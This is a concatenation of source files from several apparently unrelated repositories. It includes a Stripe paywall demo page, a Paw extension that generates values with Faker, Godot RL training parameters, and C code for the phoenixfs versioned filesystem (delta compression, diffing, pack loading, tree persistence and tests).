<p>Please review our <br /> <a href="https://ravencoin.org/mobilewallet/support/terms.html">Terms of Use </a> - <a href="https://ravencoin.org/mobilewallet/support/privacy.html">Privacy Policy</a></p>
</div>
<!-- end site footer bottom-->
</div>
<!--wrapper-->
</footer>
</body>
<!-- end site footer -->
<script type="text/javascript"> $(window).load(function() {
// Animate loader off screen
$(".se-pre-con").fadeOut("slow");;
});
</script>
</html> | muhammad-05/ravenproject.github.io |
<|start_filename|>server/stripe/stripe.js<|end_filename|>
console.log('Hello Nodejs with Lambda');
<|start_filename|>src/index-old.html<|end_filename|>
<!DOCTYPE html>
<html dir="ltr" lang="en">
<head>
<meta charset="utf-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0, minimum-scale=1.0, maximum-scale=5.0">
<title>Stencil Component Starter</title>
<script src="https://js.stripe.com/v3/"></script>
<script src="https://unpkg.com/@ionic/core@0.1.4-9/dist/ionic.js"></script>
<script src="/build/open-paywall.js"></script>
</head>
<body>
<ion-header class="header">
<ion-title>Hipster Secrets</ion-title>
</ion-header>
<ion-card class="blog-post">
<ion-card-header><h2>Espresso? Nespresso?</h2></ion-card-header>
<ion-card-content>
<p>Iceland woke cardigan freegan quinoa crucifix art party portland scenester seitan vape trust fund paleo succulents. Vice taiyaki lyft, venmo chillwave kale chips vegan drinking vinegar single-origin coffee fanny pack bespoke enamel pin meh fam.</p>
</ion-card-content>
</ion-card>
<ion-card class="blog-post">
<ion-card-header><h2>Vinyl or Cassette? Our Beanie Expert Tells All!</h2></ion-card-header>
<ion-card-content>
<open-paywall provider="stripe" access-token="<KEY>" cost="1025">
<div class="premium-content"><p>Lorem ipsum dolor amet plaid meh cornhole squid. Tousled small batch dreamcatcher PBR&B, truffaut mixtape tilde unicorn forage snackwave plaid quinoa four dollar toast cliche. Meditation sriracha pabst crucifix normcore readymade listicle. Paleo listicle locavore actually sriracha direct trade kitsch offal, vinyl chicharrones cred.
</p><p>
Tumeric ugh poke yuccie, waistcoat kogi activated charcoal letterpress. Letterpress shoreditch four loko yr bespoke typewriter. Green juice fashion axe man bun cloud bread four loko, pok pok food truck ramps gluten-free cardigan lomo. Sustainable food truck umami you probably haven't heard of them tattooed viral deep v waistcoat polaroid vaporware listicle authentic pop-up.
</p><p>
Crucifix bespoke cardigan small batch heirloom deep v occupy migas irony pop-up you probably haven't heard of them enamel pin chartreuse retro marfa. Marfa vice godard shaman, squid umami paleo unicorn quinoa glossier. Mumblecore bespoke gluten-free fam, adaptogen shoreditch farm-to-table authentic sriracha shabby chic lumbersexual humblebrag distillery kale chips glossier. Crucifix tilde tofu kinfolk disrupt sustainable. Wolf woke glossier tote bag tattooed, twee franzen deep v. Before they sold out ugh umami meditation wolf.
</p><p>
Kitsch letterpress photo booth flannel poke, prism franzen messenger bag umami. Craft beer tofu iPhone offal paleo four loko heirloom typewriter brunch. Pabst PBR&B green juice deep v ennui swag 8-bit venmo ethical umami raw denim. Meh bitters cold-pressed keytar chicharrones, VHS hexagon. Biodiesel echo park health goth chicharrones street art, bespoke iPhone trust fund vegan. Bitters ramps kogi, schlitz butcher cray squid air plant gastropub austin whatever normcore neutra artisan prism. Humblebrag iceland jianbing, crucifix gastropub air plant venmo edison bulb vape tattooed messenger bag +1.
</p><p>
Oh. You need a little dummy text for your mockup? How quaint.
</p><p>
I bet you’re still using Bootstrap too…</p></div>
</open-paywall>
</ion-card-content>
</ion-card>
</body>
<style>
</style>
<script>
document.addEventListener('paymentMade', (event) => {
document.querySelector('.premium-content').style.filter = "none";
console.log('Payment Made', event);
});
</script>
</html>
| secretshardul/open-paywall |
<|start_filename|>src/FakerGenerator.js<|end_filename|>
import faker from 'faker';
export default class FakerGenerator {
constructor(locale, category, method, args) {
this.category = category;
this.method = method;
this.args = args;
this.faker = faker;
this.faker.locale = locale;
}
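// Resolve the configured faker category and method, then evaluate them with the
// raw argument string; returns an empty string when the category/method pair is unknown.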
generate() {
if (
typeof this.faker[this.category] !== 'undefined'
&& typeof this.faker[this.category][this.method] !== 'undefined'
) {
return eval(`this.faker.${this.category}.${this.method}(${this.args});`);
}
return '';
}
}
<|start_filename|>Makefile<|end_filename|>
.DEFAULT_GOAL := help
.PHONY: build test
.SILENT:
YELLOW := $(shell tput -Txterm setaf 3)
RESET := $(shell tput -Txterm sgr0)
identifier = com.rebelinblue.PawExtensions.FakerDynamicValue
extensions_dir = $(HOME)/Library/Containers/com.luckymarmot.Paw/Data/Library/Application Support/com.luckymarmot.Paw/Extensions/
## Build the extension
build:
npm install
npm run build
cp README.md LICENSE.md ./build/$(identifier)/
## Clean up the build directory
clean:
rm -Rf ./build/
## Install the extension
install: clean build
mkdir -p "$(extensions_dir)$(identifier)/"
cp -r ./build/$(identifier)/* "$(extensions_dir)$(identifier)/"
## Run tests
test:
npm run test
## Run eslint
lint:
npm run lint
## Generate code coverage
coverage:
npm run test:coverage
## Create an archive for the extension
archive:
ifndef TRAVIS_TAG
cd ./build/; zip -r FakerDynamicValue.zip "$(identifier)/"
else
cd ./build/; zip -r FakerDynamicValue-$(TRAVIS_TAG).zip "$(identifier)/"
endif
## Prints this help
help:
@echo "\nUsage: make ${YELLOW}<target>${RESET}\n\nThe following targets are available:\n";
@awk -v skip=1 \
'/^##/ { sub(/^[#[:blank:]]*/, "", $$0); doc_h=$$0; doc=""; skip=0; next } \
skip { next } \
/^#/ { doc=doc "\n" substr($$0, 2); next } \
/:/ { sub(/:.*/, "", $$0); printf "\033[34m%-30s\033[0m\033[1m%s\033[0m %s\n", $$0, doc_h, doc; skip=1 }' \
$(MAKEFILE_LIST)
<|start_filename|>.eslintrc.js<|end_filename|>
module.exports = {
extends: 'airbnb-base',
parser: 'babel-eslint',
parserOptions: {
ecmaVersion: 2017
},
rules: {
'func-names': ['error', 'never'],
'no-confusing-arrow': [0],
'max-len': ['error', 120],
'no-eval': [0]
},
env: {
node: true,
mocha: true
}
};
<|start_filename|>test/FakerGenerator.spec.js<|end_filename|>
import { use, expect } from 'chai';
import dirtyChai from 'dirty-chai';
import FakerGenerator from '../src/FakerGenerator';
use(dirtyChai);
describe('FakerGenerator', () => {
it('Returns an empty string if the category is invalid', () => {
const generator = new FakerGenerator('en', 'invalid');
const result = generator.generate();
expect(result).to.be.empty();
});
it('Returns an empty string if the category is valid but the method is invalid', () => {
const generator = new FakerGenerator('en', 'internet', 'invalid');
const result = generator.generate();
expect(result).to.be.empty();
});
// FIXME: This should use a spy rather than use the real class
it('Calls faker', () => {
const generator = new FakerGenerator('en', 'random', 'boolean');
const result = generator.generate();
expect(result).to.be.a('boolean');
});
// FIXME: This should use a spy rather than use the real class
it('Passes the arguments to faker', () => {
const generator = new FakerGenerator('en', 'random', 'number', '{ min: 10, max: 10 }');
const result = generator.generate();
expect(result).to.be.equal(10);
});
});
<|start_filename|>.mocharc.js<|end_filename|>
module.exports = {
require: '@babel/register',
recursive: true,
reporter: 'spec'
}
<|start_filename|>webpack.config.babel.js<|end_filename|>
import path from 'path';
import UglifyPlugin from 'uglifyjs-webpack-plugin';
const production = (process.env.NODE_ENV === 'production');
module.exports = {
mode: production ? 'production' : 'development',
target: 'web',
entry: [
'faker',
'./src/FakerDynamicValue.js',
],
output: {
path: path.join(
__dirname,
'./build/com.rebelinblue.PawExtensions.FakerDynamicValue',
),
publicPath: '/build/',
filename: 'FakerDynamicValue.js',
},
module: {
rules: [{
test: /\.js?$/,
exclude: /(node_modules|bower_components)/,
use: {
loader: 'babel-loader',
},
}],
},
plugins: production ? [
new UglifyPlugin({
uglifyOptions: { warnings: false },
}),
] : [],
};
<|start_filename|>test/FakerDynamicValue.spec.js<|end_filename|>
import { use, expect } from 'chai';
import dirtyChai from 'dirty-chai';
import FakerDynamicValue from '../src/FakerDynamicValue';
use(dirtyChai);
describe('FakerDynamicValue', () => {
let dynamicValues;
beforeEach(() => {
dynamicValues = new FakerDynamicValue();
});
it('Should return the title', () => {
expect(dynamicValues.title()).to.be.equal(FakerDynamicValue.title);
});
it('Should return empty text when no method or category are set', () => {
expect(dynamicValues.text()).to.be.empty();
});
it('Should return empty text when no method is set', () => {
dynamicValues.category = 'internet';
expect(dynamicValues.text()).to.be.empty();
});
it('Should return empty text when no category is set', () => {
dynamicValues.method = 'password';
expect(dynamicValues.text()).to.be.empty();
});
it('Should return the category and method when both are set', () => {
dynamicValues.category = 'internet';
dynamicValues.method = 'password';
expect(dynamicValues.text()).to.be.equal('internet.password()');
});
it('Should return the category and method with options when all are set', () => {
dynamicValues.category = 'internet';
dynamicValues.method = 'password';
dynamicValues.options = '15, true';
expect(dynamicValues.text()).to.be.equal('internet.password(15, true)');
});
// FIXME: This should use a spy rather than use the real class as now we are
// testing something outside the scope of this test
it('Should call the FakerGenerator', () => {
dynamicValues.locale = 'en';
dynamicValues.category = 'random';
dynamicValues.method = 'number';
dynamicValues.options = '{ min: 10, max: 10 }';
const result = dynamicValues.evaluate();
expect(result).to.be.equal(10);
});
});
| bymost/Paw-FakerDynamicValue |
<|start_filename|>envs/checkpoints/space_shooter/params.json<|end_filename|>
{
"batch_mode": "truncate_episodes",
"clip_param": 0.2,
"entropy_coeff": 0.0001,
"entropy_coeff_schedule": null,
"env": "godot",
"env_config": {
"action_repeat": null,
"env_path": "envs/example_envs/builds/SpaceShooter/space_shooter.x86_64",
"framerate": null,
"seed": 0,
"show_window": false
},
"framework": "torch",
"gamma": 0.99,
"lambda": 0.95,
"lr": 0.0003,
"model": {
"fcnet_hiddens": [
32,
32
],
"lstm_cell_size": 32,
"num_framestacks": 4,
"use_lstm": false
},
"no_done_at_end": true,
"num_envs_per_worker": 16,
"num_gpus": 1,
"num_sgd_iter": 16,
"num_workers": 4,
"rollout_fragment_length": 32,
"sgd_minibatch_size": 1024,
"soft_horizon": true,
"train_batch_size": 8192,
"vf_clip_param": 1.0
} | r0nk/godot_rl_agents |
<|start_filename|>delta.h<|end_filename|>
#ifndef DELTA_H_
#define DELTA_H_
#include "common.h"
#define HASH_LIMIT 64
#define RABIN_SHIFT 23
#define RABIN_WINDOW 16
#define DELTA_SIZE_MIN 4
/*
* The maximum size for any opcode sequence, including the initial header
* plus Rabin window plus biggest copy.
*/
#define MAX_OP_SIZE (5 + 5 + 1 + RABIN_WINDOW + 7)
struct index_entry {
const unsigned char *ptr;
unsigned int val;
};
struct unpacked_index_entry {
struct index_entry entry;
struct unpacked_index_entry *next;
};
struct delta_index {
unsigned long memsize;
const void *src_buf;
unsigned long src_size;
unsigned int hash_mask;
struct index_entry *hash[0];
};
void *diff_delta(const void *src_buf, unsigned long src_bufsize,
const void *trg_buf, unsigned long trg_bufsize,
unsigned long *delta_size, unsigned long max_delta_size);
void *patch_delta(const void *src_buf, unsigned long src_size,
const void *delta_buf, unsigned long delta_size,
unsigned long *dst_size);
#endif
<|start_filename|>t/test-pack.c<|end_filename|>
#include "pack.h"
#include <stdio.h>
#include <string.h>
static void usage(const char *progname)
{
die("Usage: %s <packfile> <packfile.idx> <sha1>", progname);
}
int main(int argc, char* argv[])
{
unsigned char sha1[20];
if (argc < 4)
usage(argv[0]);
load_packing_info(argv[1], argv[2], true);
get_sha1_hex(argv[3], sha1);
return unpack_entry(sha1, ".");
}
<|start_filename|>t/test-diff.c<|end_filename|>
#include "diff.h"
#include <stdio.h>
#include <stdlib.h>
#include <sys/stat.h>
static void usage(const char *progname)
{
die("Usage: %s <file1> <file2> [outfile]", progname);
}
int main(int argc, char* argv[])
{
FILE *file1, *file2, *outfile;
size_t sz1, sz2;
struct stat st1, st2;
if (argc < 3)
usage(argv[0]);
if (stat(argv[1], &st1))
die("Could not stat %s", argv[1]);
if (!(file1 = fopen(argv[1], "rb")))
die("Could not open %s", argv[1]);
sz1 = (size_t)(st1.st_size);
if (stat(argv[2], &st2))
die("Could not stat %s", argv[2]);
if (!(file2 = fopen(argv[2], "rb")))
die("Could not open %s", argv[2]);
sz2 = (size_t)(st2.st_size);
outfile = stdout;
if (argc > 3) {
if (!(outfile = fopen(argv[3], "w")))
die("Could not open %s", argv[3]);
}
phoenixfs_diff(file1, sz1, file2, sz2, outfile);
fclose(file1);
fclose(file2);
if (outfile)
fclose(outfile);
return 0;
}
<|start_filename|>diff.h<|end_filename|>
#ifndef DIFF_H_
#define DIFF_H_
#include <stdio.h>
#include "common.h"
#include "xdiff/xdiff.h"
int xdl_diff(mmfile_t *mf1, mmfile_t *mf2, xpparam_t const *xpp,
xdemitconf_t const *xecfg, xdemitcb_t *ecb);
int phoenixfs_diff(FILE* file1, size_t sz1, FILE* file2, size_t sz2, FILE* outfile);
#endif
<|start_filename|>t/test-compress.c<|end_filename|>
#include "compress.h"
#include <string.h>
#include <stdio.h>
#include <zlib.h>
#include <errno.h>
int main(int argc, char* argv[])
{
FILE *src;
if (argc < 3)
die("Usage: %s <i|d> <filename>", argv[0]);
if (!(src = fopen(argv[2], "rb")))
return -errno;
if (!strcmp(argv[1], "i"))
zinflate(src, stdout);
else if (!strcmp(argv[1], "d"))
zdeflate(src, stdout, -1);
else
die("Usage: %s <i|d> <filename>", argv[0]);
fclose(src);
return 0;
}
<|start_filename|>common.h<|end_filename|>
#ifndef COMMON_H_
#define COMMON_H_
#if 1
#define PHOENIXFS_DBG(f, ...) \
{ \
FILE *logfh = fopen("/tmp/phoenixfs.log", "a"); \
if (logfh) { \
fprintf(logfh, "l. %4d: " f "\n", __LINE__, ##__VA_ARGS__); \
fclose(logfh); \
} \
}
#else
#define PHOENIXFS_DBG(f, ...) while(0)
#endif
void die(const char *err, ...);
#endif
<|start_filename|>main.h<|end_filename|>
#ifndef MAIN_H_
#define MAIN_H_
#include <time.h>
#include <stdio.h>
#include "common.h"
#include "buffer.h"
#include "diff.h"
#define DATE_LEN 26
enum subcmd {
SUBCMD_NONE,
SUBCMD_MOUNT,
SUBCMD_LOG,
SUBCMD_DIFF,
};
int phoenixfs_fuse(int argc, char *argv[]);
#endif
<|start_filename|>persist.c<|end_filename|>
#include "persist.h"
#include <stdint.h>
#include <stdio.h>
#include <string.h>
unsigned char path_buf[PATH_MAX] = "\0";
/* --------------
* The dump part
* --------------
*/
/**
* Format:
* <> :=
* (struct file_record)
*/
static void dump_frs(struct vfile_record *vfr, uint8_t start_rev,
uint8_t rev_nr, FILE *outfile)
{
while (start_rev < rev_nr) {
fwrite(vfr->history[start_rev],
sizeof(struct file_record), 1, outfile);
free(vfr->history[start_rev]);
PHOENIXFS_DBG("dump_frs:: %s [%u]", vfr->name, start_rev);
start_rev = (start_rev + 1) % REV_TRUNCATE;
}
}
/**
* Format:
* <> :=
* num_keys | [key | name_len | name | rev_nr | [<dump_frs>][...]][...]
*/
static void dump_vfr_tree(struct node *root, FILE *outfile)
{
struct vfile_record *vfr;
uint8_t start_rev, rev_nr;
uint16_t name_len;
int num_keys = 0;
int i = 0;
node *iter;
if (!(iter = root)) {
/* Write num_keys = 0 */
fwrite(&i, sizeof(uint16_t), 1, outfile);
return;
}
/* First compute and write the number of keys */
while (!iter->is_leaf)
iter = iter->pointers[0];
while (1) {
for (i = 0; i < iter->num_keys; i++)
num_keys++;
if (iter->pointers && iter->pointers[BTREE_ORDER - 1] != NULL)
iter = iter->pointers[BTREE_ORDER - 1];
else
break;
}
fwrite(&num_keys, sizeof(uint16_t), 1, outfile);
/* Now write the entries */
iter = root;
while (!iter->is_leaf)
iter = iter->pointers[0];
while (1) {
for (i = 0; i < iter->num_keys; i++) {
/* Write the key */
fwrite(&(iter->keys[i]), sizeof(uint16_t), 1, outfile);
vfr = find(root, iter->keys[i], 0);
/* Compute name_len; write name_len and name */
name_len = strlen((const char *) vfr->name);
fwrite(&name_len, sizeof(uint16_t), 1, outfile);
fwrite(vfr->name, name_len * sizeof(unsigned char), 1, outfile);
PHOENIXFS_DBG("dump_vfr_tree:: vfr %s", (const char *) vfr->name);
/* Compute and write rev_nr and HEAD */
if (vfr->HEAD < 0) {
start_rev = 0;
rev_nr = 0;
} else if (vfr->history[(vfr->HEAD + 1) % REV_TRUNCATE]) {
/* History is full, and is probably wrapping around */
start_rev = (vfr->HEAD + 1) % REV_TRUNCATE;
rev_nr = 20;
} else {
/* History is not completely filled */
start_rev = 0;
rev_nr = vfr->HEAD + 1;
}
fwrite(&rev_nr, sizeof(uint8_t), 1, outfile);
/* Write the actual file records in chronological order */
dump_frs(vfr, start_rev, rev_nr, outfile);
}
if (iter->pointers && iter->pointers[BTREE_ORDER - 1] != NULL)
iter = iter->pointers[BTREE_ORDER - 1];
else
break;
}
destroy_tree(root);
}
/**
* Format:
* <> :=
* num_keys | [key | name_len | name | [<dump_vfr>][...]][...]
*/
void dump_dr_tree(struct node *root, FILE *outfile)
{
struct dir_record *dr;
uint16_t name_len;
int num_keys = 0;
int i = 0;
node *iter;
if (!(iter = root)) {
/* Write num_keys = 0 */
fwrite(&i, sizeof(uint16_t), 1, outfile);
return;
}
/* First compute and write the number of keys */
while (!iter->is_leaf)
iter = iter->pointers[0];
while (1) {
for (i = 0; i < iter->num_keys; i++)
num_keys++;
if (iter->pointers && iter->pointers[BTREE_ORDER - 1] != NULL)
iter = iter->pointers[BTREE_ORDER - 1];
else
break;
}
fwrite(&num_keys, sizeof(uint16_t), 1, outfile);
/* Now write the entries */
iter = root;
while (!iter->is_leaf)
iter = iter->pointers[0];
while (1) {
for (i = 0; i < iter->num_keys; i++) {
/* Write the key */
fwrite(&(iter->keys[i]), sizeof(uint16_t), 1, outfile);
dr = find(root, iter->keys[i], 0);
/* Compute name_len; write name_len and name */
name_len = strlen((const char *) dr->name);
fwrite(&name_len, sizeof(uint16_t), 1, outfile);
fwrite(dr->name, name_len * sizeof(unsigned char), 1, outfile);
PHOENIXFS_DBG("dump_dr_tree:: %s", (const char *) dr->name);
dump_vfr_tree(dr->vroot, outfile);
}
if (iter->pointers && iter->pointers[BTREE_ORDER - 1] != NULL)
iter = iter->pointers[BTREE_ORDER - 1];
else
break;
}
destroy_tree(root);
}
/* --------------
* The load part
* --------------
*/
/**
* Format:
* <> :=
* num_keys | [key | name_len | name | rev_nr | [<load_frs>][...]][...]
*/
struct node *load_vfr_tree(FILE *infile)
{
struct node *root;
struct vfile_record *vfr;
uint16_t key;
uint16_t num_keys;
uint16_t name_len;
uint8_t rev_nr;
register int i, j;
root = NULL;
memset(&num_keys, 0, sizeof(uint16_t));
if (fread(&num_keys, sizeof(uint16_t), 1, infile) < 1)
die("Read error: num_keys");
for (i = 0; i < num_keys; i++) {
memset(&key, 0, sizeof(uint16_t));
if (fread(&key, sizeof(uint16_t), 1, infile) < 1)
die("Read error: key");
memset(&name_len, 0, sizeof(uint16_t));
if (fread(&name_len, sizeof(uint16_t), 1, infile) < 1)
die("Read error: name_len");
memset(&path_buf, 0, PATH_MAX);
if (fread(&path_buf, name_len * sizeof(unsigned char), 1, infile) < 1)
die("Read error: path_buf");
memset(&rev_nr, 0, sizeof(uint8_t));
if (fread(&rev_nr, sizeof(uint8_t), 1, infile) < 1)
die("Read error: rev_nr");
vfr = make_vfr((const char *) path_buf);
root = insert(root, key, (void *) vfr);
for (j = 0; j < rev_nr; j++) {
vfr->history[j] = malloc(sizeof(struct file_record));
memset(vfr->history[j], 0, sizeof(struct file_record));
if (fread(vfr->history[j], sizeof(struct file_record),
1, infile) < 1)
die("Read error: vfr->history[%d]", j);
PHOENIXFS_DBG("load_vfr_tree:: %s [%d]", vfr->name, j);
}
vfr->HEAD = rev_nr - 1;
}
return root;
}
/**
* Format:
* <> :=
* num_keys | [key | name_len | name | [<load_vfr>][...]][...]
*/
struct node *load_dr_tree(FILE *infile)
{
struct node *root;
struct dir_record *dr;
uint16_t key;
uint16_t num_keys;
uint16_t name_len;
register int i;
root = NULL;
memset(&num_keys, 0, sizeof(uint16_t));
if (fread(&num_keys, sizeof(uint16_t), 1, infile) < 1)
die("Read error: num_keys");
for (i = 0; i < num_keys; i++) {
memset(&key, 0, sizeof(uint16_t));
if (fread(&key, sizeof(uint16_t), 1, infile) < 1)
die("Read error: key");
memset(&name_len, 0, sizeof(uint16_t));
if (fread(&name_len, sizeof(uint16_t), 1, infile) < 1)
die("Read error: name_len");
memset(&path_buf, 0, PATH_MAX);
if (fread(&path_buf, name_len * sizeof(unsigned char), 1, infile) < 1)
die("Read error: path_buf");
PHOENIXFS_DBG("load_dr_tree:: %s", (const char *) path_buf);
dr = make_dr((const char *) path_buf);
root = insert(root, key, (void *) dr);
dr->vroot = load_vfr_tree(infile);
}
return root;
}
<|start_filename|>diff.c<|end_filename|>
#include "diff.h"
#include <stdio.h>
#include <stdlib.h>
#include <errno.h>
#include <string.h>
#include <sys/stat.h>
static int load_mmfile(mmfile_t *mf_ptr, FILE *file, size_t sz)
{
if (!(mf_ptr->ptr = malloc(sz)))
return -errno;
if (fread(mf_ptr->ptr, sz, 1, file) < 1)
return -errno;
mf_ptr->size = sz;
return 0;
}
static int write_diff(void *file, mmbuffer_t *mb, int nbuf)
{
int i;
for (i = 0; i < nbuf; i++)
fprintf((FILE *) file, "%.*s", (int) mb[i].size, mb[i].ptr);
return 0;
}
int phoenixfs_diff(FILE* file1, size_t sz1, FILE* file2, size_t sz2, FILE* outfile)
{
int ret;
xdemitcb_t ecb;
xpparam_t xpp;
xdemitconf_t xecfg;
mmfile_t mf1, mf2;
if ((ret = load_mmfile(&mf1, file1, sz1)) < 0)
return ret;
if ((ret = load_mmfile(&mf2, file2, sz2)) < 0)
return ret;
memset(&xpp, 0, sizeof(xpp));
xpp.flags = 0;
memset(&xecfg, 0, sizeof(xecfg));
xecfg.ctxlen = 3;
ecb.outf = write_diff;
ecb.priv = outfile ? (void *) outfile : (void *) stdout;
xdl_diff(&mf1, &mf2, &xpp, &xecfg, &ecb);
free(mf1.ptr);
free(mf2.ptr);
return 0;
}
<|start_filename|>t/test-crc32.c<|end_filename|>
#include "crc32.h"
#include <stdio.h>
#include <stdint.h>
#include <unistd.h>
#include <string.h>
int main(int argc, char *argv[])
{
uint32_t crc = ~0;
unsigned char *data;
size_t length;
if (argc < 2)
die("Usage: %s <input string>", argv[0]);
length = strlen(argv[1]);
data = (unsigned char *) argv[1];
printf("%08X\n", compute_crc32(crc, data, length));
return 0;
}
<|start_filename|>sha1.h<|end_filename|>
#ifndef SHA1_H_
#define SHA1_H_
#include <stdio.h>
#include "common.h"
#include "block-sha1/sha1.h"
#define SHA1_CTX blk_SHA_CTX
#define SHA1_Init blk_SHA1_Init
#define SHA1_Update blk_SHA1_Update
#define SHA1_Final blk_SHA1_Final
int sha1_file(FILE *infile, size_t size, unsigned char *sha1);
void print_sha1(char *dst, const unsigned char *sha1);
int get_sha1_hex(const char *hex, unsigned char *sha1);
#endif
<|start_filename|>t/test-delta.c<|end_filename|>
#include "delta.h"
#include <stdio.h>
#include <errno.h>
#include <string.h>
#include <stdlib.h>
#include <sys/stat.h>
int main(int argc, char* argv[])
{
void *buf1, *buf2, *result_buf;
unsigned long result_size;
FILE *fh1, *fh2;
struct stat st1, st2;
buf1 = NULL;
buf2 = NULL;
result_buf = NULL;
if (argc < 4)
die("Usage: %s <c|a> <filename> <filename|delta>", argv[0]);
if (!(fh1 = fopen(argv[2], "rb")) ||
(lstat(argv[2], &st1) < 0) ||
!(buf1 = malloc(st1.st_size)))
return -errno;
fread(buf1, st1.st_size, 1, fh1);
if (!(fh2 = fopen(argv[3], "rb")) ||
(lstat(argv[3], &st2) < 0) ||
!(buf2 = malloc(st2.st_size)))
return -errno;
fread(buf2, st2.st_size, 1, fh2);
if (!strcmp(argv[1], "c"))
result_buf = diff_delta(buf1, st1.st_size, buf2,
st2.st_size, &result_size, 0);
else if (!strcmp(argv[1], "a"))
result_buf = patch_delta(buf1, st1.st_size, buf2,
st2.st_size, &result_size);
else
die("Usage: %s <c|a> <filename> <filename|delta>", argv[0]);
fwrite(result_buf, result_size, 1, stdout);
free(buf1);
free(buf2);
free(result_buf);
fclose(fh1);
fclose(fh2);
return 0;
}
<|start_filename|>common.c<|end_filename|>
#include <stdio.h>
#include <stdarg.h>
#include <stdlib.h>
static void vreportf(const char *fmt, va_list params)
{
char msg[4096];
vsnprintf(msg, sizeof(msg), fmt, params);
fprintf(stderr, "%s\n", msg);
}
void die(const char *fmt, ...)
{
va_list params;
va_start(params, fmt);
vreportf(fmt, params);
va_end(params);
exit(128);
}
<|start_filename|>compress.c<|end_filename|>
#include "compress.h"
#include <zlib.h>
#include <stdio.h>
int zdeflate(FILE *source, FILE *dest, int level)
{
int ret, flush;
unsigned int have;
z_stream stream;
unsigned char in[CHUNK];
unsigned char out[CHUNK];
stream.zalloc = Z_NULL;
stream.zfree = Z_NULL;
stream.opaque = Z_NULL;
if ((ret = deflateInit(&stream, level)) != Z_OK)
return ret;
do {
stream.avail_in = fread(in, 1, CHUNK, source);
if (ferror(source)) {
deflateEnd(&stream);
return Z_ERRNO;
}
flush = feof(source) ? Z_FINISH : Z_NO_FLUSH;
stream.next_in = in;
do {
stream.avail_out = CHUNK;
stream.next_out = out;
ret = deflate(&stream, flush);
have = CHUNK - stream.avail_out;
if (fwrite(out, 1, have, dest) != have || ferror(dest)) {
deflateEnd(&stream);
return Z_ERRNO;
}
} while (!stream.avail_out);
} while (flush != Z_FINISH);
deflateEnd(&stream);
return Z_OK;
}
int zinflate(FILE *source, FILE *dest)
{
int ret;
unsigned int have;
z_stream stream;
unsigned char in[CHUNK];
unsigned char out[CHUNK];
stream.zalloc = Z_NULL;
stream.zfree = Z_NULL;
stream.opaque = Z_NULL;
stream.avail_in = 0;
stream.next_in = Z_NULL;
if ((ret = inflateInit(&stream)) != Z_OK)
return ret;
do {
stream.avail_in = fread(in, 1, CHUNK, source);
if (ferror(source)) {
inflateEnd(&stream);
return Z_ERRNO;
}
if (!stream.avail_in)
break;
stream.next_in = in;
do {
stream.avail_out = CHUNK;
stream.next_out = out;
ret = inflate(&stream, Z_NO_FLUSH);
switch (ret) {
case Z_NEED_DICT:
ret = Z_DATA_ERROR;
case Z_DATA_ERROR:
case Z_MEM_ERROR:
inflateEnd(&stream);
return ret;
}
have = CHUNK - stream.avail_out;
if (fwrite(out, 1, have, dest) != have || ferror(dest)) {
inflateEnd(&stream);
return Z_ERRNO;
}
} while (!stream.avail_out);
} while (ret != Z_STREAM_END);
inflateEnd(&stream);
return ret == Z_STREAM_END ? Z_OK : Z_DATA_ERROR;
}
<|start_filename|>fstree.h<|end_filename|>
#ifndef FSTREE_H_
#define FSTREE_H_
#define FUSE_USE_VERSION 26
#define _XOPEN_SOURCE 500
#define PHOENIXFS_MAGIC 0x2888
#include "common.h"
#include "btree.h"
#include "crc32.h"
#include "sha1.h"
#include "persist.h"
#include "pack.h"
#include <sys/stat.h>
struct env_t {
char fsback[PATH_MAX];
char mountpoint[PATH_MAX];
};
int parse_pathspec(char *xpath, const char *path);
int build_xpath(char *xpath, const char *path, int rev);
char *split_basename(const char *path, char *dirname);
void fill_stat(struct stat *st, struct file_record *fr);
struct node *get_fsroot(void);
struct dir_record *find_dr(const char *path);
struct vfile_record *find_vfr(const char *path);
struct file_record *find_fr(const char *path, int rev);
struct dir_record *make_dr(const char *path);
struct vfile_record *make_vfr(const char *name);
struct file_record *make_fr(const char *path, const char *follow);
void insert_dr(struct dir_record *dr);
void insert_vfr(struct dir_record *dr, struct vfile_record *vfr);
void insert_fr(struct vfile_record *vfr, struct file_record *fr);
struct node *remove_entry(struct node *root, uint16_t key);
void fstree_insert_update_file(const char *path, const char *follow);
void fstree_remove_file(const char *path);
void fstree_dump_tree(FILE *outfile);
void fstree_load_tree(FILE *infile);
void print_fstree(void);
#define ROOTENV ((struct env_t *) fuse_get_context()->private_data)
#endif
<|start_filename|>t/Makefile<|end_filename|>
CC = gcc
RM = rm -f
MV = mv
XDIFF_LIB=../xdiff/lib.a
SHA1_LIB=../block-sha1/lib.a
BUILD_OBJS =
BUILD_OBJS += test-pack.o
BUILD_OBJS += test-diff.o
BUILD_OBJS += test-sha1.o
BUILD_OBJS += test-btree.o
BUILD_OBJS += test-crc32.o
BUILD_OBJS += test-compress.o
BUILD_OBJS += test-delta.o
ALL_TARGETS =
ALL_TARGETS += test-pack
ALL_TARGETS += test-diff
ALL_TARGETS += test-sha1
ALL_TARGETS += test-btree
ALL_TARGETS += test-crc32
ALL_TARGETS += test-compress
ALL_TARGETS += test-delta
CFLAGS = -g -O2 -Wall $(shell pkg-config fuse --cflags) $(shell pkg-config zlib --cflags)
LDFLAGS = $(shell pkg-config fuse --libs) $(shell pkg-config zlib --libs)
ALL_CFLAGS = $(CFLAGS)
ALL_LDFLAGS = $(LDFLAGS)
ALL_LIBS = $(XDIFF_LIB) $(SHA1_LIB)
QUIET_SUBDIR0 = +$(MAKE) -C # space to separate -C and subdir
QUIET_SUBDIR1 =
ifneq ($(findstring $(MAKEFLAGS),w),w)
PRINT_DIR = --no-print-directory
else # "make -w"
NO_SUBDIR = :
endif
ifneq ($(findstring $(MAKEFLAGS),s),s)
ifndef V
QUIET_CC = @echo ' ' CC $@;
QUIET_LINK = @echo ' ' LINK $@;
QUIET_SUBDIR0 = +@subdir=
QUIET_SUBDIR1 = ;$(NO_SUBDIR) echo ' ' SUBDIR $$subdir; \
$(MAKE) $(PRINT_DIR) -C $$subdir
endif
endif
XDIFF_OBJS = ../xdiff/xdiffi.o ../xdiff/xprepare.o ../xdiff/xutils.o \
../xdiff/xemit.o ../xdiff/xmerge.o ../xdiff/xpatience.o
SHA1_OBJS = ../block-sha1/sha1.o
all:: $(ALL_TARGETS)
test-%.o: test-%.c ../%.c ../common.c
$(QUIET_CC)$(CC) -I../ -o test-$*.o -c $(ALL_CFLAGS) $<
test-pack$X: test-pack.o ../pack.o ../loose.o ../sha1.o ../buffer.o ../common.o $(SHA1_LIB)
